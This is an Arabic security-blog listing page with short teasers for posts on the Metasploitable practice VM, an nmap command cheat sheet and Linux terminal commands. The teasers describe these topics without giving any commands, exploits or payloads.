 Metasploitable عبارة عن نظام مبني على توزيعة لينكس , مخصص للعمل على برامج الأنظمة الوهمية مثل Virtualbox و Vmware Workstation وهو مزود بعدة ثغرات متنوعة ونقاط ضعف تؤدي لاختراقه بسهولة, الهدف من وجود نظام كهذا مليء بالثغرات  الخطيرة هو جعله كهدف لتعلم الاختراق بشكل عملي مباشر.
  • حين تتعلم اكتشاف الثغرات واختراق المواقع والاجهزة ...  تحتاج الى تطبيقها في الواقع, فلا تجد أحيانا أهداف لتجربة  عملية أو سيناريو الاختراق عليها . وربما تجد بعض السيرفرات والمواقع لكن لا تستطيع العمل عليها لأن هذا الامر غير قانوني. 
cortex+hacker+logo

السبت، 12 يناير 2019

جميع اوامر الفحص بالانماب nmap في ورقة | nmap-mindmap

جميع اوامر الفحص بالانماب nmap في ورقة | nmap-mindmap  nmap data-sheet-cheat أوامر الان ماب  اهم اوامر nmap, كتاب اوامر nmap,شرح جميع اوامر nmap, شرح اوامر nmap,جميع اوامر nmap

أولا من لا يعرف أداة الان ماب Nmap

هي أداة تستعمل في فحص الانظمة و الشبكات ، و استخراج المنافذ اوالبورتات المفتوحة في جهاز ما او سيرفر  و معرفة نوع نظام الجهاز او السيرفر واكتشاف الثغرات وغيرها من المهام المفيدة لمختبر الاختراق وللهكر  وقد صنفت من أفضل 10 ادوات لاختبار الاختراق.
مع الادوات الكثيرة والموجودة بنظام الكالي لينكس واختلافها وتعدد الاوامر الخاصة بها نحتاج في بعض الأحيان لتدوين ما نحتاجه على ورقة, هي بمثابة مذكرة و ملخص للاوامر التي نرجع اليها في حالة نسيان بعض الاوامر والبراميترات.
cortex+hacker+logo

الجمعة، 11 يناير 2019

جميع أوامر التعامل مع الطرفيّة (Terminal) احتراف اللينكس
اوامر لينكس, جميع اوامر لينكس, احتراف التيرمنال, واحتراف اللينكس, اوامر الطرفية, اوامر التيرمنال, شرح اوامر التيرمنال بالعربية
سنغطّي في هذا المقال أساسيات التعامل مع الطرفيّة (Terminal) في لينكس أو بالأحرى سطر الأوامر في لينكس بالإضافة إلى العديد من الأوامر المفيدة . إذا كنتَ جديدًا على نظام لينكس فقد تودّ أن تتعرّف على الطرفيّة قليلًا كونها الطريقة الأساسية للتعامل مع السيرفرات ذات نظام لينكس. ربما يبدو استخدام سطر الأوامر كمهمّةٍ شاقّة للوهلة الأولى ولكنه في الواقع سهلٌ للغاية إذا بدأت بتعلّم الأساسيات أولًا وبناء مهاراتك من هناك.
لماذا نستخدم سطر الأوامر؟
  • سطر الأوامر ويعني CL اختصار لـ Command line ,هل شاهدت من قبل الهكر المحترفين، الهاكر الذي يستطيع اختراق أي حاسوب في العالم حتى لو كان مؤمن بحماية قوية, او حتى اختراق الجهات العسكرية والبنوك الالكترونية في ثواني معدودة, كما في الافلام, بحيث يعمل على حاسوبه دون أن يلمس الفأرة Mouse, ذلك لان صانعي الافلام يدركون أننا بديهييا نعتبر أن الطريقة الوحيدة لانجاز الاعمال باحترافية تامة على الحاسوب هي باستعمال لوحة المفاتيح Keyboard.
  • سنتناول في هذا المقال مجموعة من الاوامر الشائعة والمستخدمة بكثرة على نظام اللينكس, بحيث قمت بتقسيمها على مجموعاتفكل مجموعة مختصة بعملية معينة, مثال: مجموعة أوامر لمعرفة معلومات النظام, التشخيص والمراقبة, تحميل الملفات من الانترنت, التعامل مع الملفات والمجلدات من نسخ ولصق وغيرها, التعامل مع النظام كايقاف التشغيل بطرق مختلفة...ستجد الأمر على اليسار والشرح الخاص به موجود على اليمين باللغة العربية
cortex+hacker+logo
كورتكس هكر: شروحات اللينكس واختبار الاختراق والحماية | CortexHacker
كورتكس هكر هي مدونة تهتم بطرح مواضيع اختبار الاختراق وأمن المعلومات, وطرق اكتشاف الثغرات بالبرامج والمواقع و كيفية الحماية منها, وطرق التخفي وأسرار الديب ويب وكل ما يخص الاختراق الأخلاقي
جميع الحقوق محفوظة ل كورتكس هكر | Cortex Hacker
صمم وكود بكل من طرف